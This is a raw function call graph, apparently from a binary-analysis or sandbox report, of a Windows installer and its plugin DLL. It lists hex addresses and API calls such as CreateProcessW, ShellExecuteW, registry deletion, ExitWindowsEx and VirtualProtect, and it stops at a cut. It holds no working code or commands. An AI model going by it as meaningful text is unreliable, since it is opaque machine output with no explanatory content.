4323->4322 4324 4032c8 SetFilePointer 4323->4324 4326 4032f9 4323->4326 4329 4063ee 4323->4329 4336 402d1a 4323->4336 4324->4313 4325->4317 4327 405c37 ReadFile 4326->4327 4328 40330c 4327->4328 4328->4323 4330 406413 4329->4330 4331 40641b 4329->4331 4330->4323 4331->4330 4332 4064a2 GlobalFree 4331->4332 4333 4064ab GlobalAlloc 4331->4333 4334 406522 GlobalAlloc 4331->4334 4335 406519 GlobalFree 4331->4335 4332->4333 4333->4330 4333->4331 4334->4330 4334->4331 4335->4334 4337 402d43 4336->4337 4338 402d2b 4336->4338 4341 402d53 GetTickCount 4337->4341 4342 402d4b 4337->4342 4339 402d34 DestroyWindow 4338->4339 4340 402d3b 4338->4340 4339->4340 4340->4323 4341->4340 4343 402d61 4341->4343 4351 4062eb 4342->4351 4345 402d96 CreateDialogParamW ShowWindow 4343->4345 4346 402d69 4343->4346 4345->4340 4346->4340 4355 402cfe 4346->4355 4348 402d77 wsprintfW 4349 4051f2 25 API calls 4348->4349 4350 402d94 4349->4350 4350->4340 4352 406308 PeekMessageW 4351->4352 4353 406318 4352->4353 4354 4062fe DispatchMessageW 4352->4354 4353->4340 4354->4352 4356 402d0d 4355->4356 4357 402d0f MulDiv 4355->4357 4356->4357 4357->4348 4358 402253 4359 402261 4358->4359 4360 40225b 4358->4360 4362 402b3a 18 API calls 4359->4362 4365 40226f 4359->4365 4361 402b3a 18 API calls 4360->4361 4361->4359 4362->4365 4363 40227d 4364 402b3a 18 API calls 4363->4364 4367 402286 WritePrivateProfileStringW 4364->4367 4365->4363 4366 402b3a 18 API calls 4365->4366 4366->4363 4990 402454 4991 402c44 19 API calls 4990->4991 4992 40245e 4991->4992 4993 402b1d 18 API calls 4992->4993 4994 402467 4993->4994 4995 40248b RegEnumValueW 4994->4995 4996 40247f RegEnumKeyW 4994->4996 4997 402793 4994->4997 4995->4997 4998 4024a4 RegCloseKey 4995->4998 4996->4998 4998->4997 5000 401ed4 5001 402b3a 18 API calls 5000->5001 5002 401edb 5001->5002 5003 40628b 2 API calls 5002->5003 5004 401ee1 5003->5004 5005 401ef2 5004->5005 5007 405e8f wsprintfW 5004->5007 5007->5005 4381 4022d5 4382 402305 4381->4382 4383 4022da 4381->4383 4385 402b3a 18 API calls 4382->4385 4384 402c44 19 API calls 4383->4384 4386 4022e1 4384->4386 4387 40230c 4385->4387 4388 4022eb 4386->4388 4392 402322 4386->4392 4393 402b7a RegOpenKeyExW 4387->4393 4389 402b3a 18 API calls 4388->4389 4391 4022f2 RegDeleteValueW RegCloseKey 4389->4391 4391->4392 4394 402ba5 4393->4394 4395 402c0e 4393->4395 4396 402bcb RegEnumKeyW 4394->4396 4397 402bdd RegCloseKey 4394->4397 4399 402c02 RegCloseKey 4394->4399 4402 402b7a 3 API calls 4394->4402 4395->4392 4396->4394 4396->4397 4398 4062b2 3 API calls 4397->4398 4400 402bed 4398->4400 4401 402bf1 4399->4401 4400->4401 4403 402c1d RegDeleteKeyW 4400->4403 4401->4395 4402->4394 4403->4401 4411 4014d7 4412 402b1d 18 API calls 4411->4412 4413 4014dd Sleep 4412->4413 4415 4029c7 4413->4415 4627 40335a #17 SetErrorMode OleInitialize 4628 4062b2 3 API calls 4627->4628 4629 40339d SHGetFileInfoW 4628->4629 4702 405f48 lstrcpynW 4629->4702 4631 4033c8 GetCommandLineW 4703 405f48 lstrcpynW 4631->4703 4633 4033da GetModuleHandleW 4634 4033f4 4633->4634 4635 4059c0 CharNextW 4634->4635 4636 403402 CharNextW 4635->4636 4646 403414 4636->4646 4637 403516 4638 40352a GetTempPathW 4637->4638 4704 403326 4638->4704 4640 403542 4641 403546 GetWindowsDirectoryW lstrcatW 4640->4641 4642 40359c DeleteFileW 4640->4642 4644 403326 11 API calls 4641->4644 4712 402dbc GetTickCount GetModuleFileNameW 4642->4712 4643 4059c0 CharNextW 4643->4646 4647 403562 4644->4647 4646->4637 4646->4643 4650 403518 4646->4650 4647->4642 4649 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4647->4649 4648 4035b0 4654 4059c0 CharNextW 4648->4654 4685 403653 4648->4685 4696 403663 4648->4696 4653 403326 11 API calls 4649->4653 4796 405f48 lstrcpynW 4650->4796 4657 403594 4653->4657 4668 4035cf 4654->4668 4657->4642 4657->4696 4658 403772 4660 403815 ExitProcess 4658->4660 4662 4062b2 3 API calls 4658->4662 4659 40367c 4661 405724 MessageBoxIndirectW 4659->4661 4665 40368a ExitProcess 4661->4665 4667 403785 4662->4667 4663 403692 lstrcatW lstrcmpiW 4670 4036ae CreateDirectoryW SetCurrentDirectoryW 4663->4670 4663->4696 4664 40362d 4669 405a9b 18 API calls 4664->4669 4671 4062b2 3 API calls 4667->4671 4668->4663 4668->4664 4672 403639 4669->4672 4673 4036d1 4670->4673 4674 4036c6 4670->4674 4676 40378e 4671->4676 4672->4696 4797 405f48 lstrcpynW 4672->4797 4809 405f48 lstrcpynW 4673->4809 4808 405f48 lstrcpynW 4674->4808 4678 4062b2 3 API calls 4676->4678 4680 403797 4678->4680 4684 4037b5 4680->4684 4690 4037a5 GetCurrentProcess 4680->4690 4681 403648 4798 405f48 lstrcpynW 4681->4798 4683 405f6a 18 API calls 4686 403710 DeleteFileW 4683->4686 4687 4062b2 3 API calls 4684->4687 4742 40391f 4685->4742 4688 40371d CopyFileW 4686->4688 4699 4036df 4686->4699 4689 4037ec 4687->4689 4688->4699 4691 403801 ExitWindowsEx 4689->4691 4695 40380e 4689->4695 4690->4684 4691->4660 4691->4695 4692 403766 4693 405de2 40 API calls 4692->4693 4693->4696 4694 405de2 40 API calls 4694->4699 4697 40140b 2 API calls 4695->4697 4799 40382d 4696->4799 4697->4660 4698 405f6a 18 API calls 4698->4699 4699->4683 4699->4692 4699->4694 4699->4698 4701 403751 CloseHandle 4699->4701 4810 4056c3 CreateProcessW 4699->4810 4701->4699 4702->4631 4703->4633 4705 4061dc 5 API calls 4704->4705 4707 403332 4705->4707 4706 40333c 4706->4640 4707->4706 4708 405993 3 API calls 4707->4708 4709 403344 CreateDirectoryW 4708->4709 4813 405be3 4709->4813 4817 405bb4 GetFileAttributesW CreateFileW 4712->4817 4714 402dff 4741 402e0c 4714->4741 4818 405f48 lstrcpynW 4714->4818 4716 402e22 4717 4059df 2 API calls 4716->4717 4718 402e28 4717->4718 4819 405f48 lstrcpynW 4718->4819 4720 402e33 GetFileSize 4721 402f34 4720->4721 4725 402e4a 4720->4725 4722 402d1a 33 API calls 4721->4722 4723 402f3b 4722->4723 4726 402f77 GlobalAlloc 4723->4726 4723->4741 4821 40330f SetFilePointer 4723->4821 4724 4032f9 ReadFile 4724->4725 4725->4721 4725->4724 4727 402fcf 4725->4727 4733 402d1a 33 API calls 4725->4733 4725->4741 4730 402f8e 4726->4730 4728 402d1a 33 API calls 4727->4728 4728->4741 4734 405be3 2 API calls 4730->4734 4731 402f58 4732 4032f9 ReadFile 4731->4732 4735 402f63 4732->4735 4733->4725 4736 402f9f CreateFileW 4734->4736 4735->4726 4735->4741 4737 402fd9 4736->4737 4736->4741 4820 40330f SetFilePointer 4737->4820 4739 402fe7 4740 403062 46 API calls 4739->4740 4740->4741 4741->4648 4741->4741 4743 4062b2 3 API calls 4742->4743 4744 403933 4743->4744 4745 403939 4744->4745 4746 40394b 4744->4746 4831 405e8f wsprintfW 4745->4831 4747 405e15 3 API calls 4746->4747 4748 40397b 4747->4748 4750 40399a lstrcatW 4748->4750 4752 405e15 3 API calls 4748->4752 4751 403949 4750->4751 4822 403bf5 4751->4822 4752->4750 4755 405a9b 18 API calls 4756 4039cc 4755->4756 4757 403a60 4756->4757 4759 405e15 3 API calls 4756->4759 4758 405a9b 18 API calls 4757->4758 4760 403a66 4758->4760 4761 4039fe 4759->4761 4762 403a76 LoadImageW 4760->4762 4763 405f6a 18 API calls 4760->4763 4761->4757 4766 403a1f lstrlenW 4761->4766 4770 4059c0 CharNextW 4761->4770 4764 403b1c 4762->4764 4765 403a9d RegisterClassW 4762->4765 4763->4762 4769 40140b 2 API calls 4764->4769 4767 403ad3 SystemParametersInfoW CreateWindowExW 4765->4767 4768 403b26 4765->4768 4771 403a53 4766->4771 4772 403a2d lstrcmpiW 4766->4772 4767->4764 4768->4696 4773 403b22 4769->4773 4775 403a1c 4770->4775 4774 405993 3 API calls 4771->4774 4772->4771 4776 403a3d GetFileAttributesW 4772->4776 4773->4768 4777 403bf5 19 API calls 4773->4777 4778 403a59 4774->4778 4775->4766 4779 403a49 4776->4779 4781 403b33 4777->4781 4832 405f48 lstrcpynW 4778->4832 4779->4771 4780 4059df 2 API calls 4779->4780 4780->4771 4783 403bc2 4781->4783 4784 403b3f ShowWindow LoadLibraryW 4781->4784 4787 4052c5 5 API calls 4783->4787 4785 403b65 GetClassInfoW 4784->4785 4786 403b5e LoadLibraryW 4784->4786 4789 403b79 GetClassInfoW RegisterClassW 4785->4789 4790 403b8f DialogBoxParamW 4785->4790 4786->4785 4788 403bc8 4787->4788 4791 403be4 4788->4791 4792 403bcc 4788->4792 4789->4790 4793 40140b 2 API calls 4790->4793 4794 40140b 2 API calls 4791->4794 4792->4768 4795 40140b 2 API calls 4792->4795 4793->4768 4794->4768 4795->4768 4796->4638 4797->4681 4798->4685 4800 403848 4799->4800 4801 40383e CloseHandle 4799->4801 4802 403852 CloseHandle 4800->4802 4803 40385c 4800->4803 4801->4800 4802->4803 4834 40388a 4803->4834 4806 4057d0 71 API calls 4807 40366c OleUninitialize 4806->4807 4807->4658 4807->4659 4808->4673 4809->4699 4811 4056f2 CloseHandle 4810->4811 4812 4056fe 4810->4812 4811->4812 4812->4699 4814 405bf0 GetTickCount GetTempFileNameW 4813->4814 4815 403358 4814->4815 4816 405c26 4814->4816 4815->4640 4816->4814 4816->4815 4817->4714 4818->4716 4819->4720 4820->4739 4821->4731 4823 403c09 4822->4823 4833 405e8f wsprintfW 4823->4833 4825 403c7a 4826 405f6a 18 API calls 4825->4826 4827 403c86 SetWindowTextW 4826->4827 4828 403ca2 4827->4828 4829 4039aa 4827->4829 4828->4829 4830 405f6a 18 API calls 4828->4830 4829->4755 4830->4828 4831->4751 4832->4757 4833->4825 4835 403898 4834->4835 4836 403861 4835->4836 4837 40389d FreeLibrary GlobalFree 4835->4837 4836->4806 4837->4836 4837->4837 5015 40155b 5016 40296d 5015->5016 5019 405e8f wsprintfW 5016->5019 5018 402972 5019->5018 5020 4038dd 5021 4038e8 5020->5021 5022 4038ec 5021->5022 5023 4038ef GlobalAlloc 5021->5023 5023->5022 5024 40165e 5025 402b3a 18 API calls 5024->5025 5026 401665 5025->5026 5027 402b3a 18 API calls 5026->5027 5028 40166e 5027->5028 5029 402b3a 18 API calls 5028->5029 5030 401677 MoveFileW 5029->5030 5031 401683 5030->5031 5032 40168a 5030->5032 5034 401423 25 API calls 5031->5034 5033 40628b 2 API calls 5032->5033 5036 402197 5032->5036 5035 401699 5033->5035 5034->5036 5035->5036 5037 405de2 40 API calls 5035->5037 5037->5031 3852 4023e0 3863 402c44 3852->3863 3854 4023ea 3867 402b3a 3854->3867 3857 4023fe RegQueryValueExW 3858 40241e 3857->3858 3860 402424 RegCloseKey 3857->3860 3858->3860 3873 405e8f wsprintfW 3858->3873 3859 402793 3860->3859 3864 402b3a 18 API calls 3863->3864 3865 402c5d 3864->3865 3866 402c6b RegOpenKeyExW 3865->3866 3866->3854 3868 402b46 3867->3868 3874 405f6a 3868->3874 3871 4023f3 3871->3857 3871->3859 3873->3860 3890 405f77 3874->3890 3875 4061c2 3876 402b67 3875->3876 3908 405f48 lstrcpynW 3875->3908 3876->3871 3892 4061dc 3876->3892 3878 40602a GetVersion 3878->3890 3879 406190 lstrlenW 3879->3890 3882 405f6a 10 API calls 3882->3879 3884 4060a5 GetSystemDirectoryW 3884->3890 3885 4060b8 GetWindowsDirectoryW 3885->3890 3886 4061dc 5 API calls 3886->3890 3887 405f6a 10 API calls 3887->3890 3888 406131 lstrcatW 3888->3890 3889 4060ec SHGetSpecialFolderLocation 3889->3890 3891 406104 SHGetPathFromIDListW CoTaskMemFree 3889->3891 3890->3875 3890->3878 3890->3879 3890->3882 3890->3884 3890->3885 3890->3886 3890->3887 3890->3888 3890->3889 3901 405e15 RegOpenKeyExW 3890->3901 3906 405e8f wsprintfW 3890->3906 3907 405f48 lstrcpynW 3890->3907 3891->3890 3898 4061e9 3892->3898 3893 40625f 3894 406264 CharPrevW 3893->3894 3896 406285 3893->3896 3894->3893 3895 406252 CharNextW 3895->3893 3895->3898 3896->3871 3898->3893 3898->3895 3899 40623e CharNextW 3898->3899 3900 40624d CharNextW 3898->3900 3909 4059c0 3898->3909 3899->3898 3900->3895 3902 405e89 3901->3902 3903 405e49 RegQueryValueExW 3901->3903 3902->3890 3904 405e6a RegCloseKey 3903->3904 3904->3902 3906->3890 3907->3890 3908->3876 3910 4059c6 3909->3910 3911 4059dc 3910->3911 3912 4059cd CharNextW 3910->3912 3911->3898 3912->3910 5038 401ce5 GetDlgItem GetClientRect 5039 402b3a 18 API calls 5038->5039 5040 401d17 LoadImageW SendMessageW 5039->5040 5041 401d35 DeleteObject 5040->5041 5042 4029c7 5040->5042 5041->5042 5043 405166 5044 405176 5043->5044 5045 40518a 5043->5045 5046 4051d3 5044->5046 5047 40517c 5044->5047 5048 405192 IsWindowVisible 5045->5048 5054 4051a9 5045->5054 5049 4051d8 CallWindowProcW 5046->5049 5050 4041e6 SendMessageW 5047->5050 5048->5046 5051 40519f 5048->5051 5052 405186 5049->5052 5050->5052 5056 404abc SendMessageW 5051->5056 5054->5049 5061 404b3c 5054->5061 5057 404b1b SendMessageW 5056->5057 5058 404adf GetMessagePos ScreenToClient SendMessageW 5056->5058 5059 404b13 5057->5059 5058->5059 5060 404b18 5058->5060 5059->5054 5060->5057 5070 405f48 lstrcpynW 5061->5070 5063 404b4f 5071 405e8f wsprintfW 5063->5071 5065 404b59 5066 40140b 2 API calls 5065->5066 5067 404b62 5066->5067 5072 405f48 lstrcpynW 5067->5072 5069 404b69 5069->5046 5070->5063 5071->5065 5072->5069 5073 4042e8 lstrlenW 5074 404307 5073->5074 5075 404309 WideCharToMultiByte 5073->5075 5074->5075 5076 100018a9 5077 100018cc 5076->5077 5078 100018ff GlobalFree 5077->5078 5079 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5077->5079 5078->5079 5080 10001272 2 API calls 5079->5080 5081 10001a87 GlobalFree GlobalFree 5080->5081 4173 40206a 4174 402b3a 18 API calls 4173->4174 4175 402071 4174->4175 4176 402b3a 18 API calls 4175->4176 4177 40207b 4176->4177 4178 402b3a 18 API calls 4177->4178 4179 402084 4178->4179 4180 402b3a 18 API calls 4179->4180 4181 40208e 4180->4181 4182 402b3a 18 API calls 4181->4182 4183 402098 4182->4183 4184 4020ac CoCreateInstance 4183->4184 4185 402b3a 18 API calls 4183->4185 4188 4020cb 4184->4188 4185->4184 4187 402197 4188->4187 4189 401423 4188->4189 4190 4051f2 25 API calls 4189->4190 4191 401431 4190->4191 4191->4187 5089 4028ea 5092 405f48 lstrcpynW 5089->5092 5091 4028f0 5092->5091 5093 40156b 5094 401584 5093->5094 5095 40157b ShowWindow 5093->5095 5096 401592 ShowWindow 5094->5096 5097 4029c7 5094->5097 5095->5094 5096->5097 5098 40296c 5100 402972 5098->5100 5101 405e8f wsprintfW 5098->5101 5101->5100 5102 404b6e GetDlgItem GetDlgItem 5103 404bc0 7 API calls 5102->5103 5110 404dd9 5102->5110 5104 404c63 DeleteObject 5103->5104 5105 404c56 SendMessageW 5103->5105 5106 404c6c 5104->5106 5105->5104 5108 404ca3 5106->5108 5109 405f6a 18 API calls 5106->5109 5107 404ebd 5112 404f69 5107->5112 5122 404f16 SendMessageW 5107->5122 5145 404dcc 5107->5145 5111 40419a 19 API calls 5108->5111 5113 404c85 SendMessageW SendMessageW 5109->5113 5110->5107 5120 404abc 5 API calls 5110->5120 5141 404e4a 5110->5141 5116 404cb7 5111->5116 5114 404f73 SendMessageW 5112->5114 5115 404f7b 5112->5115 5113->5106 5114->5115 5119 404fa4 5115->5119 5124 404f94 5115->5124 5125 404f8d ImageList_Destroy 5115->5125 5121 40419a 19 API calls 5116->5121 5117 404201 8 API calls 5123 40515f 5117->5123 5118 404eaf SendMessageW 5118->5107 5126 405113 5119->5126 5144 404b3c 4 API calls 5119->5144 5149 404fdf 5119->5149 5120->5141 5133 404cc5 5121->5133 5127 404f2b SendMessageW 5122->5127 5122->5145 5124->5119 5128 404f9d GlobalFree 5124->5128 5125->5124 5131 405125 ShowWindow GetDlgItem ShowWindow 5126->5131 5126->5145 5130 404f3e 5127->5130 5128->5119 5129 404d9a GetWindowLongW SetWindowLongW 5132 404db3 5129->5132 5136 404f4f SendMessageW 5130->5136 5131->5145 5134 404dd1 5132->5134 5135 404db9 ShowWindow 5132->5135 5133->5129 5137 404d94 5133->5137 5140 404d15 SendMessageW 5133->5140 5142 404d51 SendMessageW 5133->5142 5143 404d62 SendMessageW 5133->5143 5154 4041cf SendMessageW 5134->5154 5153 4041cf SendMessageW 5135->5153 5136->5112 5137->5129 5137->5132 5140->5133 5141->5107 5141->5118 5142->5133 5143->5133 5144->5149 5145->5117 5146 4050e9 InvalidateRect 5146->5126 5147 4050ff 5146->5147 5155 4049d6 5147->5155 5148 40500d SendMessageW 5152 405023 5148->5152 5149->5148 5149->5152 5151 405097 SendMessageW SendMessageW 5151->5152 5152->5146 5152->5151 5153->5145 5154->5110 5156 4049f3 5155->5156 5157 405f6a 18 API calls 5156->5157 5158 404a28 5157->5158 5159 405f6a 18 API calls 5158->5159 5160 404a33 5159->5160 5161 405f6a 18 API calls 5160->5161 5162 404a64 lstrlenW wsprintfW SetDlgItemTextW 5161->5162 5162->5126 5163 4024ee 5164 4024f3 5163->5164 5165 40250c 5163->5165 5166 402b1d 18 API calls 5164->5166 5167 402512 5165->5167 5168 40253e 5165->5168 5172 4024fa 5166->5172 5170 402b3a 18 API calls 5167->5170 5169 402b3a 18 API calls 5168->5169 5171 402545 lstrlenW 5169->5171 5173 402519 WideCharToMultiByte lstrlenA 5170->5173 5171->5172 5174 402567 WriteFile 5172->5174 5175 402793 5172->5175 5173->5172 5174->5175 5176 4045ee 5177 404624 5176->5177 5178 4045fe 5176->5178 5180 404201 8 API calls 5177->5180 5179 40419a 19 API calls 5178->5179 5181 40460b SetDlgItemTextW 5179->5181 5182 404630 5180->5182 5181->5177 5183 4018ef 5184 401926 5183->5184 5185 402b3a 18 API calls 5184->5185 5186 40192b 5185->5186 5187 4057d0 71 API calls 5186->5187 5188 401934 5187->5188 5189 404970 5190 404980 5189->5190 5191 40499c 5189->5191 5200 405708 GetDlgItemTextW 5190->5200 5193 4049a2 SHGetPathFromIDListW 5191->5193 5194 4049cf 5191->5194 5195 4049b9 SendMessageW 5193->5195 5196 4049b2 5193->5196 5195->5194 5198 40140b 2 API calls 5196->5198 5197 40498d SendMessageW 5197->5191 5198->5195 5200->5197 5201 402770 5202 402b3a 18 API calls 5201->5202 5203 402777 FindFirstFileW 5202->5203 5204 40279f 5203->5204 5207 40278a 5203->5207 5205 4027a8 5204->5205 5209 405e8f wsprintfW 5204->5209 5205->5207 5210 405f48 lstrcpynW 5205->5210 5209->5205 5210->5207 5211 4014f1 SetForegroundWindow 5212 4029c7 5211->5212 5213 4018f2 5214 402b3a 18 API calls 5213->5214 5215 4018f9 5214->5215 5216 405724 MessageBoxIndirectW 5215->5216 5217 401902 5216->5217 4368 402573 4369 402b1d 18 API calls 4368->4369 4375 402582 4369->4375 4370 4026a0 4371 4025c8 ReadFile 4371->4370 4371->4375 4372 405c37 ReadFile 4372->4375 4373 4026a2 4380 405e8f wsprintfW 4373->4380 4374 402608 MultiByteToWideChar 4374->4375 4375->4370 4375->4371 4375->4372 4375->4373 4375->4374 4377 40262e SetFilePointer MultiByteToWideChar 4375->4377 4379 4026b3 4375->4379 4377->4375 4378 4026d4 SetFilePointer 4378->4370 4379->4370 4379->4378 4380->4370 5218 401df3 5219 402b3a 18 API calls 5218->5219 5220 401df9 5219->5220 5221 402b3a 18 API calls 5220->5221 5222 401e02 5221->5222 5223 402b3a 18 API calls 5222->5223 5224 401e0b 5223->5224 5225 402b3a 18 API calls 5224->5225 5226 401e14 5225->5226 5227 401423 25 API calls 5226->5227 5228 401e1b ShellExecuteW 5227->5228 5229 401e4c 5228->5229 5235 100016b6 5236 100016e5 5235->5236 5237 10001b18 22 API calls 5236->5237 5238 100016ec 5237->5238 5239 100016f3 5238->5239 5240 100016ff 5238->5240 5243 10001272 2 API calls 5239->5243 5241 10001726 5240->5241 5242 10001709 5240->5242 5245 10001750 5241->5245 5246 1000172c 5241->5246 5244 1000153d 3 API calls 5242->5244 5247 100016fd 5243->5247 5249 1000170e 5244->5249 5248 1000153d 3 API calls 5245->5248 5250 100015b4 3 API calls 5246->5250 5248->5247 5251 100015b4 3 API calls 5249->5251 5252 10001731 5250->5252 5253 10001714 5251->5253 5254 10001272 2 API calls 5252->5254 5255 10001272 2 API calls 5253->5255 5256 10001737 GlobalFree 5254->5256 5257 1000171a GlobalFree 5255->5257 5256->5247 5258 1000174b GlobalFree 5256->5258 5257->5247 5258->5247 5259 10002238 5260 10002296 5259->5260 5262 100022cc 5259->5262 5261 100022a8 GlobalAlloc 5260->5261 5260->5262 5261->5260 4599 4026f9 4600 402700 4599->4600 4601 402972 4599->4601 4602 402b1d 18 API calls 4600->4602 4603 40270b 4602->4603 4604 402712 SetFilePointer 4603->4604 4604->4601 4605 402722 4604->4605 4607 405e8f wsprintfW 4605->4607 4607->4601 5263 1000103d 5264 1000101b 5 API calls 5263->5264 5265 10001056 5264->5265 5266 402c7f 5267 402c91 SetTimer 5266->5267 5268 402caa 5266->5268 5267->5268 5269 402cf8 5268->5269 5270 402cfe MulDiv 5268->5270 5271 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5270->5271 5271->5269 5273 4014ff 5274 401507 5273->5274 5275 40151a 5273->5275 5276 402b1d 18 API calls 5274->5276 5276->5275 5277 401000 5278 401037 BeginPaint GetClientRect 5277->5278 5279 40100c DefWindowProcW 5277->5279 5280 4010f3 5278->5280 5282 401179 5279->5282 5283 401073 CreateBrushIndirect FillRect DeleteObject 5280->5283 5284 4010fc 5280->5284 5283->5280 5285 401102 CreateFontIndirectW 5284->5285 5286 401167 EndPaint 5284->5286 5285->5286 5287 401112 6 API calls 5285->5287 5286->5282 5287->5286 5288 401a00 5289 402b3a 18 API calls 5288->5289 5290 401a09 ExpandEnvironmentStringsW 5289->5290 5291 401a1d 5290->5291 5293 401a30 5290->5293 5292 401a22 lstrcmpW 5291->5292 5291->5293 5292->5293 5294 401b01 5295 402b3a 18 API calls 5294->5295 5296 401b08 5295->5296 5297 402b1d 18 API calls 5296->5297 5298 401b11 wsprintfW 5297->5298 5299 4029c7 5298->5299 4170 100027c7 4171 10002817 4170->4171 4172 100027d7 VirtualProtect 4170->4172 4172->4171 5307 401f08 5308 402b3a 18 API calls 5307->5308 5309 401f0f GetFileVersionInfoSizeW 5308->5309 5310 401f36 GlobalAlloc 5309->5310 5311 401f8c 5309->5311 5310->5311 5312 401f4a GetFileVersionInfoW 5310->5312 5312->5311 5313 401f59 VerQueryValueW 5312->5313 5313->5311 5314 401f72 5313->5314 5318 405e8f wsprintfW 5314->5318 5316 401f7e 5319 405e8f wsprintfW 5316->5319 5318->5316 5319->5311 5320 401c8e 5321 402b1d 18 API calls 5320->5321 5322 401c94 IsWindow 5321->5322 5323 4019f0 5322->5323 5324 1000164f 5325 10001516 GlobalFree 5324->5325 5328 10001667 5325->5328 5326 100016ad GlobalFree 5327 10001682 5327->5326 5328->5326 5328->5327 5329 10001699 VirtualFree 5328->5329 5329->5326 5330 406c90 5333 406421 5330->5333 5331 4064a2 GlobalFree 5332 4064ab GlobalAlloc 5331->5332 5332->5333 5334 406d8c 5332->5334 5333->5331 5333->5332 5333->5333 5333->5334 5335 406522 GlobalAlloc 5333->5335 5336 406519 GlobalFree 5333->5336 5335->5333 5335->5334 5336->5335 5337 401491 5338 4051f2 25 API calls 5337->5338 5339 401498 5338->5339 4404 402295 4405 402b3a 18 API calls 4404->4405 4406 4022a4 4405->4406 4407 402b3a 18 API calls 4406->4407 4408 4022ad 4407->4408 4409 402b3a 18 API calls 4408->4409 4410 4022b7 GetPrivateProfileStringW 4409->4410 4416 401f98 4417 401faa 4416->4417 4427 40205c 4416->4427 4418 402b3a 18 API calls 4417->4418 4419 401fb1 4418->4419 4421 402b3a 18 API calls 4419->4421 4420 401423 25 API calls 4425 402197 4420->4425 4422 401fba 4421->4422 4423 401fd0 LoadLibraryExW 4422->4423 4424 401fc2 GetModuleHandleW 4422->4424 4426 401fe1 4423->4426 4423->4427 4424->4423 4424->4426 4439 40631e WideCharToMultiByte 4426->4439 4427->4420 4430 401ff2 4433 402011 4430->4433 4434 401ffa 4430->4434 4431 40202b 4432 4051f2 25 API calls 4431->4432 4435 402002 4432->4435 4442 10001759 4433->4442 4436 401423 25 API calls 4434->4436 4435->4425 4437 40204e FreeLibrary 4435->4437 4436->4435 4437->4425 4440 406348 GetProcAddress 4439->4440 4441 401fec 4439->4441 4440->4441 4441->4430 4441->4431 4443 10001789 4442->4443 4484 10001b18 4443->4484 4445 10001790 4446 100018a6 4445->4446 4447 100017a1 4445->4447 4448 100017a8 4445->4448 4446->4435 4533 10002286 4447->4533 4516 100022d0 4448->4516 4453 100017cd 4454 1000180c 4453->4454 4455 100017ee 4453->4455 4459 10001812 4454->4459 4460 1000184e 4454->4460 4546 100024a9 4455->4546 4457 100017be 4458 100017c4 4457->4458 4464 100017cf 4457->4464 4458->4453 4527 100028a4 4458->4527 4466 100015b4 3 API calls 4459->4466 4462 100024a9 10 API calls 4460->4462 4461 100017d7 4461->4453 4543 10002b5f 4461->4543 4468 10001840 4462->4468 4463 100017f4 4557 100015b4 4463->4557 4537 10002645 4464->4537 4471 10001828 4466->4471 4475 10001895 4468->4475 4568 1000246c 4468->4568 4474 100024a9 10 API calls 4471->4474 4473 100017d5 4473->4453 4474->4468 4475->4446 4479 1000189f GlobalFree 4475->4479 4479->4446 4481 10001881 4481->4475 4572 1000153d wsprintfW 4481->4572 4482 1000187a FreeLibrary 4482->4481 4575 1000121b GlobalAlloc 4484->4575 4486 10001b3c 4576 1000121b GlobalAlloc 4486->4576 4488 10001d7a GlobalFree GlobalFree GlobalFree 4489 10001d97 4488->4489 4499 10001de1 4488->4499 4491 100020ee 4489->4491 4498 10001dac 4489->4498 4489->4499 4490 10001c1d GlobalAlloc 4492 10001b47 4490->4492 4493 10002110 GetModuleHandleW 4491->4493 4491->4499 4492->4488 4492->4490 4494 10001c68 lstrcpyW 4492->4494 4495 10001c86 GlobalFree 4492->4495 4492->4499 4500 10001c72 lstrcpyW 4492->4500 4505 10002048 4492->4505 4509 10001f37 GlobalFree 4492->4509 4513 1000122c 2 API calls 4492->4513 4514 10001cc4 4492->4514 4582 1000121b GlobalAlloc 4492->4582 4496 10002121 LoadLibraryW 4493->4496 4497 10002136 4493->4497 4494->4500 4495->4492 4496->4497 4496->4499 4583 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4497->4583 4498->4499 4579 1000122c 4498->4579 4499->4445 4500->4492 4502 10002188 4502->4499 4504 10002195 lstrlenW 4502->4504 4584 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4504->4584 4505->4499 4508 10002090 lstrcpyW 4505->4508 4508->4499 4509->4492 4510 10002148 4510->4502 4515 10002172 GetProcAddress 4510->4515 4511 100021af 4511->4499 4513->4492 4514->4492 4577 1000158f GlobalSize GlobalAlloc 4514->4577 4515->4502 4518 100022e8 4516->4518 4517 1000122c GlobalAlloc lstrcpynW 4517->4518 4518->4517 4520 10002415 GlobalFree 4518->4520 4521 100023d3 lstrlenW 4518->4521 4522 100023ba GlobalAlloc 4518->4522 4523 1000238f GlobalAlloc WideCharToMultiByte 4518->4523 4586 100012ba 4518->4586 4520->4518 4524 100017ae 4520->4524 4521->4520 4525 100023d1 4521->4525 4522->4525 4523->4520 4524->4453 4524->4457 4524->4461 4525->4520 4590 100025d9 4525->4590 4530 100028b6 4527->4530 4528 1000295b EnumWindows 4529 10002979 4528->4529 4531 10002a75 4529->4531 4532 10002a6a GetLastError 4529->4532 4530->4528 4531->4453 4532->4531 4534 10002296 4533->4534 4535 100017a7 4533->4535 4534->4535 4536 100022a8 GlobalAlloc 4534->4536 4535->4448 4536->4534 4541 10002661 4537->4541 4538 100026b2 GlobalAlloc 4542 100026d4 4538->4542 4539 100026c5 4540 100026ca GlobalSize 4539->4540 4539->4542 4540->4542 4541->4538 4541->4539 4542->4473 4544 10002b6a 4543->4544 4545 10002baa GlobalFree 4544->4545 4593 1000121b GlobalAlloc 4546->4593 4548 100024b3 4549 10002530 StringFromGUID2 4548->4549 4550 10002541 lstrcpynW 4548->4550 4551 1000250b MultiByteToWideChar 4548->4551 4552 10002554 wsprintfW 4548->4552 4553 10002571 GlobalFree 4548->4553 4554 100025ac GlobalFree 4548->4554 4555 10001272 2 API calls 4548->4555 4594 100012e1 4548->4594 4549->4548 4550->4548 4551->4548 4552->4548 4553->4548 4554->4463 4555->4548 4598 1000121b GlobalAlloc 4557->4598 4559 100015ba 4560 100015c7 lstrcpyW 4559->4560 4562 100015e1 4559->4562 4563 100015fb 4560->4563 4562->4563 4564 100015e6 wsprintfW 4562->4564 4565 10001272 4563->4565 4564->4563 4566 100012b5 GlobalFree 4565->4566 4567 1000127b GlobalAlloc lstrcpynW 4565->4567 4566->4468 4567->4566 4569 10001861 4568->4569 4570 1000247a 